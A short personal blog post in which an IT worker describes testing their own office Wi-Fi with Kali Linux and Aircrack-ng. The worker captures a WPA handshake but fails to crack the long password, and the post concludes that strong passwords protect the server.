On Wednesday I was having a slow day, and, after hearing about other systems being hit with a web-based attack the previous day, I decided to see how easy it would be for someone to reach my server on the Wifi network.
Now I feel like I don’t have to explain the devastation that could be caused by a disgruntled person who has enough Google skill to script kiddie their way and wreak havoc with traffic noise or compromise your network or server.
This is where the grey IT arts known as pentesting, (or penetration testing) comes in handy and it is on the same line as Offensive Security. Now most businesses use wired for their workstations, but with tablets and laptops becoming more powerful, there is a big shift to wireless offices and classrooms. To gain access with a wired connection you have to be on the property, not ideal if you get caught and have trespassing added onto the plethora of federal charges brought up on you; it just doesn’t seem worth the risk. But Wifi is just radio signal of a different nature, but still it is data sent in the air that can be pulled out and decoded and read.
The first line of defense is our own wireless security is that our SSID is not broadcasted for the service network, but even that is not enough. Anyone who knows how to use a network sniffer could easily see a hidden wireless network whether or not SSID is hidden or not. The next line of defense is a strong Wifi password to gain a network address. This is the portion of our defense that I was control testing.
The Setup:
Mine:
Apple Airport Extreme coming right from the DSL hooked up to an airport express in bridge mode. The reason for this setup is that it cuts down on service interruptions coming from the surrounding companies’ “Hot Spot”.
The Bad Guy:
An Acer Aspire from 2011 running Kali Linux, with Aircrack-ng running. A simple setup anyone can download from the almighty inter webs. No customization done to the Kali linux system.
Ok, so now on to the test. Our target system was picked up on a scan while the Bad Guy was sitting out in our parking lot trying to get free internet, curious on why the network was hidden. They start their attack box, and start scanning traffic going to and from the BSSID 00:24:36:A5:D7:7F (my router). What he would need is a WPA Handshake, which is when an authentication has happened between BSSID (router) and the station the computer trying to connect to. This computer is always encrypted. But that is like house locks; they only keep out the honest people. Encryption can be cracked. As you can see, with all the devices on the service network, getting a WPA handshake was easy. That is where the novice setting ended in this game.
My system survived without a breach, now that’s not to say you couldn’t brute force your way in, but that would cause alarms to go off.
So thanks to long complex passwords, my server is safe. This is a good lesson.